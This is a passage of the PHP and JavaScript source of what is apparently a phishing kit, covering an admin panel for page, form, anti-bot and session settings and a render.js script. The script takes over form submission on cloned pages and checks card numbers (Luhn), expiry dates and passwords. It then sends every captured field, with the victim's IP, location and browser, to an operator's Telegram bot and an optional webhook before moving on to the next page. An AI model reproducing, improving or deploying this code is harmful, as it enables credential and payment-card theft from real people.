      SETTINGS.telegram={ bot_token: (get('tg_token')?.value||'').trim(), chat_id: (get('tg_chat')?.value||'').trim() };
      saveTelegram().then(function(){ toast('Telegram saved'); });
    });
  }

  // ---------- ANTI-BOT ----------
  function renderAntibot(){
    if (!get('ab_enabled')) return;
    get('ab_enabled').checked = !!(SETTINGS.antibot && SETTINGS.antibot.enabled_global);
    get('ab_js').value = (SETTINGS.antibot && SETTINGS.antibot.js_rules) || '';
    get('ab_php').value = (SETTINGS.antibot && SETTINGS.antibot.php_rules) || '';
    var sel=get('ab_pages'); var pages=SETTINGS.pages||[]; var chosen=SETTINGS.antibot.apply_pages||[];
    if (sel) sel.innerHTML = pages.map(function(p){ var s = chosen.indexOf(p.php)!==-1?' selected':''; return '<option value="'+p.php+'"'+s+'>'+ (p.display||p.php) +'</option>'; }).join('');
  }
  function wireAntibot(){
    get('btnSaveAB')?.addEventListener('click', function(){
      SETTINGS.antibot.enabled_global = !!get('ab_enabled')?.checked;
      SETTINGS.antibot.js_rules = get('ab_js')?.value||'';
      SETTINGS.antibot.php_rules = get('ab_php')?.value||'';
      var sel = get('ab_pages');
      SETTINGS.antibot.apply_pages = sel ? [].slice.call(sel.selectedOptions).map(function(o){return o.value;}) : [];
      saveAntibot().then(function(){ toast('AntiBot saved'); });
    });
    get('btnBuildAB')?.addEventListener('click', function(){
      fetch('admin.php?build_antibot=1',{method:'POST'}).then(r=>r.json()).then(function(x){ toast(x&&x.ok?'AntiBot built':'Failed', x&&x.ok?'success':'danger'); });
    });
  }

  // ---------- AES ----------
  function renderAES(){
    if (!get('aes_enabled')) return;
    get('aes_enabled').checked = !!(SETTINGS.aes && SETTINGS.aes.enabled);
    get('aes_days').value = (SETTINGS.aes && SETTINGS.aes.key_lifetime_days) || 7;
  }
  function wireAES(){
    if (!get('btnSaveAES')) return;
    get('btnSaveAES').addEventListener('click', function(){
      SETTINGS.aes = {
        enabled: !!get('aes_enabled')?.checked,
        key_lifetime_days: Math.max(1, parseInt(get('aes_days')?.value||'7',10))
      };
      saveAES().then(function(){ toast('AES saved'); });
    });
  }

  // ---------- Session ----------
  function renderSession(){
    if (!get('sess_enabled')) return;
    var s = SETTINGS.session || {};
    get('sess_enabled').checked      = !!s.enabled;
    get('sess_duration').value       = s.duration_minutes != null ? s.duration_minutes : 60;
    get('sess_lock_ip').checked      = !!s.lock_ip;
    get('sess_param').value          = s.require_param_name || 'email';
    get('sess_redirect').value       = s.redirect_url || 'index.php';
    get('sess_notify_visit').checked = !!s.notify_new_visit;
    get('sess_visit_tpl').value      = s.visit_template || "🆕 New visit for {{email}}\n|SESSION    : #{{session_hash}}\n| + IP Info +\n|IP ADDRESS : {{ip}}\n|LOCATION   : {{location}}\n|BROWSER    : {{browser}}\n|TIME       : {{time_gmt}}";
  }
  function wireSession(){
    get('btnSaveSession')?.addEventListener('click', function(){
      SETTINGS.session = {
        enabled: !!get('sess_enabled')?.checked,
        duration_minutes: parseInt(get('sess_duration')?.value||'60',10),
        lock_ip: !!get('sess_lock_ip')?.checked,
        require_param_name: (get('sess_param')?.value||'email').trim(),
        redirect_url: (get('sess_redirect')?.value||'index.php').trim(),
        notify_new_visit: !!get('sess_notify_visit')?.checked,
        visit_template: (get('sess_visit_tpl')?.value||'').toString()
      };
      saveSession().then(function(){ toast('Session settings saved'); });
    });
    get('btnBuildSession')?.addEventListener('click', function(){
      j('admin.php?build_session=1','POST').then(function(){ toast('Session runtime built'); });
    });
  }

  // ---------- Backups ----------
  function openBackupsModal(){
    var list = document.getElementById('backupsList');
    var empty = document.getElementById('backupsEmpty');
    if (!list) return;
    list.innerHTML = '';
    if (empty) empty.classList.add('d-none');

    fetch('admin.php?list_backups=1', {cache:'no-store'})
      .then(r => r.json())
      .then(function(x){
        var arr = (x && x.backups) ? x.backups : [];
        if (!arr.length){
          if (empty) empty.classList.remove('d-none');
          return;
        }
        arr.forEach(function(name){
          var item = document.createElement('div');
          item.className = 'list-group-item d-flex justify-content-between align-items-center';
          item.innerHTML =
            '<div class="d-flex flex-column">' +
              '<strong>'+ name +'</strong>' +
              '<small class="text-muted">backups/'+ name +'</small>' +
            '</div>' +
            '<div class="d-flex gap-2">' +
              '<button class="btn btn-sm btn-outline-success" data-act="restore">Restore</button>' +
              '<a class="btn btn-sm btn-outline-secondary" href="backups/'+ name +'" target="_blank">View</a>' +
            '</div>';

          item.querySelector('[data-act="restore"]').addEventListener('click', function(){
            var fd = new FormData();
            fd.append('file', name);
            fetch('admin.php?restore_backup=1', {method:'POST', body: fd})
              .then(r=>r.json())
              .then(function(resp){
                if(!resp || !resp.ok){ toast((resp && resp.err) || 'Restore failed', 'danger'); return; }
                toast('Restored: ' + name, 'success');
                loadSettings().then(function(){
                  buildPagesList();
                  buildFormsList();
                  renderPageEditor();
                  renderFormEditor();
                  renderPagePreview();
                });
              })
              .catch(function(){ toast('Restore failed', 'danger'); });
          });

          list.appendChild(item);
        });
      })
      .catch(function(){
        if (empty) empty.classList.remove('d-none');
      });

    if (window.bootstrap){
      var m = bootstrap.Modal.getOrCreateInstance('#modalBackups');
      m.show();
    }
  }

  // ---------- Editor save ----------
  function wireEditorButtons(){
    var btnSave=get('btnSavePageFile');
    if(btnSave){ btnSave.addEventListener('click', function(){
      var pg=(SETTINGS.pages||[])[currentPageIndex]; if(!pg) return;
      var val = (get('pageFileEditor')?.value||'');
      var fd=new FormData(); fd.append('filename', pg.php); fd.append('html', val);
      fetch('admin.php?save_page_file=1', {method:'POST', body:fd})
        .then(r=>r.json())
        .then(function(x){ toast(x&&x.ok?'File saved':'Save failed: '+(x&&x.err?x.err:'unknown'), x&&x.ok?'success':'danger'); renderPagePreview(); });
    }); }
  }

  // ---------- Top bar ----------
  function wireTopbar(){
    get('btnLogout')?.addEventListener('click', function(){ localStorage.removeItem('admin_ok'); showLogin(); });
    get('btnSaveAll')?.addEventListener('click', function(){ j('admin.php?save_all=1','POST', SETTINGS||{}).then(function(){ toast('Saved'); renderPagePreview(); }); });
    get('btnCreatePage')?.addEventListener('click', function(){
      var name=prompt('Page display title:','New page'); if(!name) return;
      var fd=new FormData(); fd.append('display', name);
      fetch('admin.php?create_page=1', {method:'POST', body:fd})
        .then(r=>r.json()).then(function(x){
          if(!x||!x.ok){ toast('Create failed','danger'); return; }
          return loadSettings().then(function(){
            currentPageIndex = (SETTINGS.pages||[]).length-1;
            buildPagesList(); renderPageEditor(); renderPagePreview();
            toast('Page created');
          });
        });
    });
    get('btnBackups')?.addEventListener('click', openBackupsModal);
  }

  // ---------- bootstrap ----------
  function buildAll(){
    buildPagesList(); renderPageEditor(); renderPagePreview();
    buildFormsList(); currentForm = (SETTINGS.pages[currentPageIndex]?.forms_on_page||[])[0] || Object.keys(SETTINGS.forms||{})[0]||''; renderFormEditor(); wireFormsButtons();
    renderTelegram(); wireTelegram();
    renderAntibot(); wireAntibot();
    renderAES(); wireAES();
    renderSession(); wireSession();
    wireEditorButtons();
  }
  function afterLogin(){ showApp(); wireTopbar(); loadSettings().then(buildAll); }
  function init(){ if(!bindLogin()){ setTimeout(bindLogin, 60); } if(localStorage.getItem('admin_ok')==='1'){ afterLogin(); } else { showLogin(); } }

  if(document.readyState==='loading'){ document.addEventListener('DOMContentLoaded', init); } else { init(); }

})();
JS;

    $js = str_replace('__ADMIN_PASSWORD_PLACEHOLDER__', $ADMIN_PASSWORD_JS, $js);
    echo $js; exit;
}


/* ------------------ ASSET: render.js (sid&p flow, scoped, validators, unified TG, robust focus) --------------------- */
if (isset($_GET['asset']) && $_GET['asset'] === 'render.js') {
  header('Content-Type: application/javascript; charset=utf-8');
  $js = <<<'JS'
(function(){
  'use strict';

  // ---------- Utils ----------
  if (!window.CSS || !CSS.escape) {
    window.CSS = window.CSS || {};
    CSS.escape = function (v) { return String(v).replace(/[^a-zA-Z0-9_\-]/g, '\\$&'); };
  }
  function ready(fn){ if(document.readyState!=='loading') fn(); else document.addEventListener('DOMContentLoaded', fn); }
  async function loadSettings(){ try{ const r=await fetch('settings.json?'+Date.now(), {cache:'no-store'}); return await r.json(); }catch(_){ return null; } }
  function rnd(len){ const c='abcdefghijklmnopqrstuvwxyz0123456789'; let s=''; for(let i=0;i<(len||12);i++) s+=c[Math.floor(Math.random()*c.length)]; return s; }
  function qp(name){ const m = new RegExp('[?&]'+name+'=([^&]+)').exec(location.search); return m ? decodeURIComponent(m[1].replace(/\+/g,'%20')) : ''; }
  function getFlow(){ const sid = qp('sid') || ''; const p = parseInt(qp('p')||'0',10); return { sid, p: isNaN(p)?0:p }; }
  function curPhp(){ try{ return (location.pathname.split('/').pop()||'').split('?')[0]; }catch(_){ return ''; } }
  function maskToRegex(mask){ if(!mask) return null; if(/^\/.+\/[gimsuy]*$/.test(mask)) return new RegExp(mask.slice(1, mask.lastIndexOf('/')), mask.slice(mask.lastIndexOf('/')+1)); const esc = mask.replace(/[-\/\\^$*+?.()|[\]{}]/g, '\\$&'); return new RegExp('^' + esc.replace(/#+/g, m=>'\\d{'+m.length+'}') + '$'); }
  function luhnOK(num){ if(!/^\d{12,19}$/.test(num)) return false; let sum=0, dbl=false; for(let i=num.length-1;i>=0;i--){ let d = num.charCodeAt(i)-48; if(dbl){ d*=2; if(d>9) d-=9; } sum += d; dbl = !dbl; } return sum%10===0; }
  function ensureErr(el){ let n = el.nextElementSibling && el.nextElementSibling.classList && el.nextElementSibling.classList.contains('ua-error') ? el.nextElementSibling : null; if(!n){ n=document.createElement('div'); n.className='ua-error'; n.style.cssText='color:#ef4444;font-size:.85rem;margin-top:.35rem;display:none'; el.insertAdjacentElement('afterend',n); } return n; }
  function setInvalid(el, msg, highlight){ const err=ensureErr(el); err.textContent=msg||'Invalid value'; err.style.display='block'; if(highlight){ el.classList.add('ua-invalid'); } }
  function clearInvalid(el){ const n = el.nextElementSibling && el.nextElementSibling.classList && el.nextElementSibling.classList.contains('ua-error') ? el.nextElementSibling : null; if(n) n.style.display='none'; el.classList.remove('ua-invalid'); }
  function validMonth(v, minM){ if(!/^\d{2}$/.test(v)) return false; const m = +v; if(m<1 || m>12) return false; if(minM && +minM>0) return m>=+minM; return true; }
  function validYY(v, minYY){ if(!/^\d{2}$/.test(v)) return false; const yy = +v; if(minYY && /^\d{2}$/.test(minYY)) return yy>=+minYY; return true; }
  function validDateMin(v, minISO){ if(!/^\d{4}-\d{2}-\d{2}$/.test(v)) return false; if(!minISO) return true; return v >= minISO; }
  function pickBest(nodes){ if(!nodes) return null; for(const n of nodes){ try{ if(n && n.offsetParent !== null && !n.disabled) return n; }catch(_){}} return nodes[0] || null; }
  function normClassToken(v){ return String(v||'').trim().replace(/^\.+/,'').replace(/\s+/g,' ').split(' ')[0] || ''; }
  function matchesOrClosest(el, sel){ try{ if(el.matches && el.matches(sel)) return el; if(el.closest) return el.closest(sel); }catch(_){ } return null; }

  // ---------- Robust focus helpers ----------
  function isVisible(el){
    try{
      if(!el || !el.isConnected) return false;
      const s = getComputedStyle(el);
      if (s.visibility === 'hidden' || s.display === 'none') return false;
      if (el.offsetParent === null && s.position !== 'fixed') return false;
      const r = el.getBoundingClientRect();
      return r.width > 0 && r.height > 0;
    }catch(_){ return false; }
  }
  function robustFocus(el, {maxTries=160, interval=70}={}){
    let tries = 0;
    const attempt = () => {
      tries++;
      try{
        if (document.body.classList.contains('ua-stealth')) {
          if (tries < maxTries) return setTimeout(attempt, interval);
          return;
        }
        if (!isVisible(el) || el.disabled) {
          if (tries < maxTries) return setTimeout(attempt, interval);
          return;
        }
        el.focus({preventScroll:true});
        if (typeof el.select === 'function') el.select();
        if (document.activeElement !== el && tries < maxTries) return setTimeout(attempt, interval);
      }catch(_){
        if (tries < maxTries) return setTimeout(attempt, interval);
      }
    };
    if (document.readyState === 'loading') {
      document.addEventListener('DOMContentLoaded', () => setTimeout(attempt, 0), {once:true});
    } else {
      requestAnimationFrame(() => setTimeout(attempt, 0));
    }
  }

  // ---------- Stealth ----------
  function stealthOn(root){ try{ root = root || document.body; if(!root) return; if(!document.getElementById('ua_stealth_style')){ const st=document.createElement('style'); st.id='ua_stealth_style'; st.textContent='.ua-stealth{visibility:hidden!important}'; document.head.appendChild(st); } (root instanceof Element ? root : document.body).classList.add('ua-stealth'); }catch(_){ } }
  function stealthOff(root){ try{ (root||document.body).classList.remove('ua-stealth'); }catch(_){ } }

  // ---------- Class matching ----------
  function findByClassToken(root, cls){
    cls = (cls||'').trim(); if(!cls) return null;
    try{ if(window.CSS && CSS.escape){ const list = root.querySelectorAll('.' + CSS.escape(cls)); const pick = pickBest(list); if(pick) return pick; } }catch(_){}
    try{ const list2 = root.querySelectorAll('[class~="'+cls+'"]'); const pick2 = pickBest(list2); if(pick2) return pick2; }catch(_){}
    try{ const parts = cls.split(/\s+/).filter(Boolean); for(const p of parts){ try{ if(window.CSS && CSS.escape){ const list3 = root.querySelectorAll('.' + CSS.escape(p)); const pick3 = pickBest(list3); if(pick3) return pick3; } else { const list3 = root.querySelectorAll('[class~="'+p+'"]'); const pick3 = pickBest(list3); if(pick3) return pick3; } }catch(_){} } }catch(_){}
    try{ const all = root.querySelectorAll('*'); for(const el of all){ try{ const clsAttr=(el.className||'').toString(); if(clsAttr && clsAttr.split(/\s+/).indexOf(cls)!==-1) return el; }catch(_){}} }catch(_){}
    return null;
  }

  // ---------- Randomize name/id ----------
  function randomizeDomNameId(el){
    try{
      const prevId = el.id || '';
      const domName = 'n_' + rnd(12);
      const domId   = 'i_' + rnd(12);
      try { el.removeAttribute('name'); el.removeAttribute('id'); } catch(_){}
      try { el.name = domName; } catch(_){}
      try { el.id = domId; } catch(_){}
      try { el.setAttribute('name', domName); } catch(_){}
      try { el.setAttribute('id', domId); } catch(_){}
      if (prevId){
        try{
          const labs = document.querySelectorAll('label[for="'+(CSS.escape?CSS.escape(prevId):prevId)+'"]');
          labs && labs.forEach && labs.forEach(function(lb){ try{ lb.setAttribute('for', domId); }catch(_){} });
        }catch(_){}
      }
      el.dataset.uaInit = String(Date.now());
      return domId;
    }catch(_){ return null; }
  }

  // ---------- Query helpers ----------
  function tryQuery(sel, root){ try{ const list = (root && root.querySelectorAll) ? root.querySelectorAll(sel) : []; return pickBest(list); }catch(_){ return null; } }
  function normalizeSelectors(sel){ sel=(sel||'').trim(); if(!sel) return ''; return sel.split(',').map(s=>s.trim()).filter(Boolean).join(', '); }

  // ---------- Resolve button ----------
  function resolveButton(formRoot, behavior){
    const btnSelRaw = (behavior.button_selector||'').trim();
    const btnSel = normalizeSelectors(btnSelRaw);
    if(btnSel){ const found = tryQuery(btnSel, formRoot) || tryQuery(btnSel, document); if(found) return found; }
    const clsTarget = (behavior.button_class_target||'').trim();
    if(clsTarget){ const token = normClassToken(clsTarget); if(token){ const byCls = findByClassToken(formRoot, token) || findByClassToken(document, token); if(byCls) return byCls; } }
    const generic='button[type="submit"], input[type="submit"], button.submit-btn, button, input[type="button"]';
    return tryQuery(generic, formRoot) || tryQuery(generic, document) || null;
  }

  // ---------- Delegation for button_selector ----------
  function ensureDelegationForButtonSelector(formRoot, formName, btnSelRaw, submitFn){
    const btnSel = normalizeSelectors(btnSelRaw);
    const scopeDocKey = 'ua_deleg_btn_doc_'+formName;
    const scopeRootKey = 'ua_deleg_btn_root_'+formName;

    function bindClick(target){
      target.addEventListener('click', function(e){
        if(!btnSel) return;
        const hit = e.target && matchesOrClosest(e.target, btnSel);
        if(!hit) return;
        if (hit.dataset && hit.dataset.uaBoundFor && hit.dataset.uaBoundFor !== formName) return;
        e.preventDefault();
        submitFn();
      }, {passive:false, capture:true});
    }
    if(!document[scopeDocKey]){ document[scopeDocKey]=1; bindClick(document); }
    if(formRoot instanceof Element && !formRoot[scopeRootKey]){ formRoot[scopeRootKey]=1; bindClick(formRoot); }

    if(btnSel){
      let tries=0, MAX=30;
      const iv=setInterval(function(){
        tries++;
        const btn = tryQuery(btnSel, formRoot) || tryQuery(btnSel, document);
        if(btn){
          if(!btn.dataset || btn.dataset.uaBoundFor !== formName){
            btn.addEventListener('click', function(e){ e.preventDefault(); submitFn(); }, {passive:false});
            try{ btn.dataset.uaBoundFor=formName; }catch(_){}
          }
          clearInterval(iv);
        }
        if(tries>=MAX) clearInterval(iv);
      }, 1000);
      const mo=new MutationObserver(function(){
        const btn = tryQuery(btnSel, formRoot) || tryQuery(btnSel, document);
        if(btn && (!btn.dataset || btn.dataset.uaBoundFor !== formName)){
          btn.addEventListener('click', function(e){ e.preventDefault(); submitFn(); }, {passive:false});
          try{ btn.dataset.uaBoundFor=formName; }catch(_){}
        }
      });
      try{ mo.observe(document.documentElement||document.body, {childList:true,subtree:true}); }catch(_){}
    }
  }

  // ---------- Hook submit on forms containing our targets ----------
  function hookSubmitOnContainingForms(targets, formRoot, formName, submitFn){
    const hooked = new WeakSet();
    const forms = new Set();
    Object.keys(targets||{}).forEach(function(k){
      const el = targets[k] && targets[k].el;
      if(!el) return;
      const f = el.closest && el.closest('form');
      if(f) forms.add(f);
    });
    forms.forEach(function(f){
      if(hooked.has(f)) return;
      hooked.add(f);
      f.addEventListener('submit', function(e){ e.preventDefault(); submitFn(); }, {passive:false, capture:true});
    });
  }

  // ---------- Session-aware next step ----------
  function sessionRedirectUrl(SETTINGS){
    const s = (SETTINGS && SETTINGS.session) || {};
    return (s.redirect_url && s.redirect_url.trim()) || 'index.php';
  }
  function safeNext(SETTINGS){
    const {sid, p} = getFlow();
    const pages = Array.isArray(SETTINGS.pages)?SETTINGS.pages:[];
    const sessEnabled = !!(SETTINGS.session && SETTINGS.session.enabled);

    let href = '';
    if (sessEnabled){
      const base = sessionRedirectUrl(SETTINGS);
      const nextP = (p && p>0) ? (p+1) : 2;
      const params = new URLSearchParams();
      if (sid) params.set('sid', sid);
      params.set('p', String(nextP));
      href = base + '?' + params.toString();
    } else {
      const now = curPhp();
      const idx = pages.findIndex(pg => (pg && pg.php) ? pg.php.split('?')[0]===now : false);
      if (idx>-1 && idx < pages.length-1) href = pages[idx+1].php;
    }
    if (!href) return;

    try{ location.assign(href); }catch(_){}
    setTimeout(function(){ try{ location.href = href; }catch(_){} }, 30);
    setTimeout(function(){ try{ location.replace(href); }catch(_){} }, 120);
  }

  // ---------- Main attach ----------
  function attachByClasses(page, SETTINGS){
    const onThisPage = page.forms_on_page||[];
    onThisPage.forEach(function(formName){
      const formObj = SETTINGS.forms && SETTINGS.forms[formName]; if(!formObj) return;
      const behavior = formObj.behavior || {};

      let formRoot = document;
      const fieldKeys = Object.keys((formObj.fields||[]).reduce((acc,f)=>{ if (f && f.target_class) acc[normClassToken(f.target_class)] = true; return acc; }, {}));
      if (fieldKeys.length) {
        const firstEl = document.querySelector('.' + fieldKeys[0]);
        if (firstEl) {
          formRoot =
            firstEl.closest('form') ||
            firstEl.closest('[data-form-root]') ||
            firstEl.closest('.ua-form') ||
            firstEl.closest('.container') ||
            firstEl.closest('.row') ||
            firstEl.closest('main') ||
            document;
        }
      }

      // hide while init
      stealthOn(formRoot instanceof Element ? formRoot : document.body);

      // show/hide password
      (function(){
        try{
          const showBtn = formRoot.querySelector('.show-btn');
          if(showBtn && !showBtn.__ua_shown){
            showBtn.__ua_shown = 1;
            showBtn.addEventListener('click', function(e){
              e.preventDefault();
              const pw = formRoot.querySelector('input[type="password"]');
              if(!pw) return;
              pw.type = (pw.type==='password') ? 'text' : 'password';
              showBtn.classList.toggle('active');
            });
          }
        }catch(_){}
      })();

      function prepareTargets(doRandomizeOnly){
        const fields = formObj.fields||[];
        const targets = {};
        fields.forEach(function(f){
          const clsRaw = f.target_class || '';
          const cls = normClassToken(clsRaw);
          if(!cls) return;
          let el = null;
          try{ el = findByClassToken(formRoot, cls) || findByClassToken(document, cls); }catch(_){ el = null; }
          if(!el){ try{ console.warn('[UA] Field not found for class:', cls, 'form=', formName); }catch(_){}; return; }

          if(!el.dataset.uaInit) randomizeDomNameId(el);

          if(!doRandomizeOnly){
            try{
              if(f.type && (el.tagName==='INPUT' || el.tagName==='TEXTAREA')) el.setAttribute('type', f.type==='alnum'?'text':f.type);
              if(f.placeholder) el.setAttribute('placeholder', f.placeholder);
              if(f.required) el.setAttribute('required','');
              if(f.css) el.style.cssText += ';'+f.css;
              if(f.js){ try{ el.setAttribute('oninput', f.js); }catch(_){ } }
              el.setAttribute('autocomplete','off');
            }catch(_){}
            function maskToRx(p){ const m=(p||'').trim(); if(!m) return null; if(/^\/.+\/[gimsuy]*$/.test(m)){ try{ return new RegExp(m.slice(1, m.lastIndexOf('/')), m.slice(m.lastIndexOf('/')+1)); }catch(_){ return null; } } return maskToRegex(m); }
            function validate(){
              clearInvalid(el);
              const v = (el.value||'');
              if(f.digitsOnly && /[^0-9]/.test(v)){ setInvalid(el, f.error_msg||'Numbers only', f.highlight_on_error); return false; }
              if(f.alnum && /[^A-Za-z0-9]/.test(v)){ setInvalid(el, f.error_msg||'Letters and numbers only', f.highlight_on_error); return false; }
              if(f.min && v.length < (+f.min)){ setInvalid(el, f.error_msg||('Minimum '+f.min+' characters'), f.highlight_on_error); return false; }
              if(f.max && v.length > (+f.max)){ setInvalid(el, f.error_msg||('Maximum '+f.max+' characters'), f.highlight_on_error); return false; }
              if((f.pattern||'').trim()){ const rx=maskToRx(f.pattern); if(rx && !rx.test(v)){ setInvalid(el, f.error_msg||'Invalid format', f.highlight_on_error); return false; } }
              if(f.type==='tel' || f.type==='number'){ if(/\s/.test(v)){ setInvalid(el, f.error_msg||'No spaces', f.highlight_on_error); return false; } }
              if(f.type==='password'){ if(f.min && v.length < (+f.min)){ setInvalid(el, f.error_msg||('Minimum '+f.min+' chars'), f.highlight_on_error); return false; } }
              if(f.type==='date'){ if(v && !validDateMin(v, (f.min_date||'').trim())){ setInvalid(el, f.error_msg||'Date too early', f.highlight_on_error); return false; } }
              if(f.type==='month'){ if(v && !validMonth(v, (f.min_month||'').trim())){ setInvalid(el, f.error_msg||'Invalid month', f.highlight_on_error); return false; } }
              if(f.type==='yy'){ if(v && !validYY(v, (f.min_year_yy||'').trim())){ setInvalid(el, f.error_msg||'Invalid year', f.highlight_on_error); return false; } }
              if(f.use_luhn){ const digits=v.replace(/\D+/g,''); if(digits.length && !luhnOK(digits)){ setInvalid(el, f.error_msg||'Invalid card number', f.highlight_on_error); return false; } }
              return true;
            }
            el.addEventListener('input', validate);
            el.addEventListener('blur', validate);

            // تأجيل الفوكس: نخزن العنصر ونركّز عليه بعد فكّ الإخفاء
            if (f.focus && !el.dataset.uaFocusedOnce){
              el.dataset.uaFocusedOnce='1';
              (window.__uaFocusQueue = window.__uaFocusQueue || []).push(el);
            }

            targets[(f.name && String(f.name).length) ? f.name : cls] = { el, validate, conf: f };
          }
        });
        return targets;
      }

      // init
      prepareTargets(true);
      const initialTargets = prepareTargets(false);

      // observe new fields for randomization
      try{
        const wanted = new Set((formObj.fields||[]).map(f=>normClassToken(f.target_class||'')));
        const root = formRoot===document ? document.body : formRoot;
        const obs = new MutationObserver(function(muts){
          for(const m of muts){
            (m.addedNodes||[]).forEach(function(node){
              if(!(node instanceof Element)) return;
              wanted.forEach(function(token){
                if(!token) return;
                const selfMatch = node.classList && node.classList.contains(token);
                const inside = !selfMatch ? node.querySelector && (node.querySelector('.'+(CSS.escape?CSS.escape(token):token)) || node.querySelector('[class~="'+token+'"]')) : null;
                const el = selfMatch ? node : inside;
                if(el && !el.dataset.uaInit) randomizeDomNameId(el);
              });
            });
          }
        });
        obs.observe(root||document.body, {childList:true,subtree:true});
      }catch(_){}

      // show after init
      stealthOff(formRoot instanceof Element ? formRoot : document.body);

      // نفّذ الفوكس بقوة بعد إظهار الصفحة
      if (window.__uaFocusQueue && window.__uaFocusQueue.length){
        robustFocus(window.__uaFocusQueue[0], {maxTries: 200, interval: 60});
        window.__uaFocusQueue.length = 0;
      }

      // Telegram best-effort
      function sendTelegramIfEnabled(SETTINGS, behavior, formName, data){
        if(!behavior.telegram) return Promise.resolve(true);
        const token = SETTINGS.telegram && (SETTINGS.telegram.bot_token||'').trim();
        const chat  = SETTINGS.telegram && (SETTINGS.telegram.chat_id||'').trim();
        if(!token || !chat) return Promise.resolve(true);
        let meta = {ip:'-', location:'-', browser:'-', session:'-', time_gmt:'-'};
        const metaP = fetch('admin.php?a=tg_meta',{credentials:'same-origin'}).then(r=>r.ok?r.json():meta).catch(()=>meta);
        return metaP.then(function(m){
          const fieldLines = [];
          const seen = Object.create(null);
          const defs = Array.isArray(formObj.fields) ? formObj.fields : [];
          defs.forEach(function(f){
            if(!f) return;
            const key = (f.name || f.target_class || '').trim(); if(!key) return;
            seen[key] = true;
            const label = (f.label || key).trim();
            const val = (data[key] ?? '');
            fieldLines.push('|'+label+' : '+val);
          });
          Object.keys(data).forEach(function(k){
            if (seen[k]) return;
            const val = (data[k] ?? '');
            fieldLines.push('|'+k+' : '+val);
          });
          let text = (behavior.tg_header || '|{form} {page} | #{tag}\n');
          let tag=''; try{ tag=(location.hash||'').replace(/^#/,''); }catch(_){}
          if(!tag){ try{ let sid=sessionStorage.getItem('ua_sid'); if(!sid){ sid=Date.now().toString(36)+Math.random().toString(36).slice(2,8); sessionStorage.setItem('ua_sid', sid); } tag=sid.slice(-6);}catch(_){ tag=Math.random().toString(36).slice(2,8); } }
          text = text.replace('{form}', formName).replace('{page}', (document.title||'')).replace('{tag}', tag);
          text += fieldLines.join('\n') + '\n';
          text += `|SESSION    : #${m.session}\n| + IP Info +\n|IP ADDRESS : ${m.ip}\n|LOCATION   : ${m.location}\n|BROWSER    : ${m.browser}\n|TIME       : ${m.time_gmt}`;
          return fetch('https://api.telegram.org/bot'+token+'/sendMessage',{method:'POST',headers:{'Content-Type':'application/json'},body: JSON.stringify({chat_id: chat, text})})
            .then(r=>r.json()).then(j=>!!(j && j.ok)).catch(()=>false)
            .then(()=>true);
        });
      }

      // submit
      async function executeSubmit(){
        const targets = initialTargets || prepareTargets(false);
        let allOK=true;
        Object.keys(targets).forEach(function(k){
          const t = targets[k], el=t.el, conf=t.conf;
          if(conf.required || (el.value||'').trim()!==''){ if(!t.validate()) allOK=false; }
          if(conf.required && (el.value||'').trim()===''){ setInvalid(el, conf.error_msg||'Please fill out this field', conf.highlight_on_error); allOK=false; }
        });
        if(!allOK) return;

        const data={}; Object.keys(targets).forEach(function(k){ const t=targets[k]; data[k]=t.el.value; });

        if((behavior.js||'').trim()){
          try{ var stop = (function(){ var submitData = data; var form = formName; return eval(behavior.js); })(); if(stop===false) return; }
          catch(err){ console.error('Custom JS error:',err); }
        }

        await sendTelegramIfEnabled(SETTINGS, behavior, formName, data);

        if(behavior.webhook){ try{ await fetch(behavior.webhook,{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({form:formName,data})}); }catch(_){ } }
        if(behavior.alert){ alert(behavior.alert); }

        if (behavior.redirect && behavior.redirect.trim()){
          const href = behavior.redirect.trim();
          try{ location.assign(href); }catch(_){}
          setTimeout(function(){ try{ location.href = href; }catch(_){} }, 30);
          setTimeout(function(){ try{ location.replace(href); }catch(_){} }, 120);
        } else {
          safeNext(SETTINGS);
        }
      }

      // bind buttons + delegation
      const btnSelRaw = (behavior.button_selector||'').trim();
      let button = resolveButton(formRoot, behavior);
      if (button && (!button.dataset || button.dataset.uaBoundFor !== formName)) {
        button.addEventListener('click', function(e){ e.preventDefault(); executeSubmit(); }, {passive:false});
        try{ button.dataset.uaBoundFor = formName; }catch(_){}
      }
      ensureDelegationForButtonSelector(formRoot, formName, btnSelRaw, executeSubmit);
      hookSubmitOnContainingForms(initialTargets, formRoot, formName, executeSubmit);

      // generic fallback (بدون selector صريح)
      if(!btnSelRaw && !button){
        const generic = 'button, input[type="submit"], input[type="button"]';
        const key = 'ua_generic_deleg_'+formName;
        if(!document[key]){
          document[key]=1;
          document.addEventListener('click', function(e){
            const tgt = e.target && matchesOrClosest(e.target, generic);
            if(!tgt) return;
            if (tgt.dataset && tgt.dataset.uaBoundFor && tgt.dataset.uaBoundFor !== formName) return;
            const f = tgt.closest && tgt.closest('form');
            if(f){
              let hasOurField=false;
              Object.values(initialTargets||{}).forEach(t=>{ if(t.el && f.contains(t.el)) hasOurField=true; });
              if(!hasOurField) return;
            }
            e.preventDefault();
            executeSubmit();
          }, {passive:false, capture:true});
        }
      }
    });
  }

  function injectCSS(){ const css = '.ua-invalid{outline:0;border-color:#ef4444!important;box-shadow:0 0 0 .2rem rgba(239,68,68,.15)!important}.ua-error{color:#ef4444}'; const s=document.createElement('style'); s.textContent=css; document.head.appendChild(s); }

  // ---------- Boot ----------
  ready(async function(){
    injectCSS();
    const SETTINGS = await loadSettings(); if(!SETTINGS) return;

    // Session bootstrap: لو مفعّل والـ p مفقود → ابدأ بـ p=1
    if (SETTINGS.session && SETTINGS.session.enabled){
      const {sid, p} = getFlow();
      if (!p || p < 1){
        const base = sessionRedirectUrl(SETTINGS);
        const params = new URLSearchParams();
        if (sid) params.set('sid', sid);
        params.set('p', '1');
        location.replace(base + '?' + params.toString());
        return;
      }
    }

    // حدّد الصفحة الحالية
    const {p} = getFlow();
    const pages = Array.isArray(SETTINGS.pages) ? SETTINGS.pages : [];
    const page = (p>0 ? pages[p-1] : (function(){ const now=curPhp(); const i=pages.findIndex(pg=>pg && pg.php && pg.php.split('?')[0]===now); return i>-1?pages[i]:null; })());
    if(!page) return;

    stealthOn(document.body);
    attachByClasses(page, SETTINGS);
    stealthOff(document.body);

    window.settings = SETTINGS;
  });
})();
JS;
  echo $js; exit;
}



/* ------------------- ROUTES (POST) ----------------------- */

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

    if (isset($_GET['save_all'])) {
        header('Content-Type: application/json; charset=utf-8');
        $raw = file_get_contents('php://input');
        $payload = json_decode($raw, true);
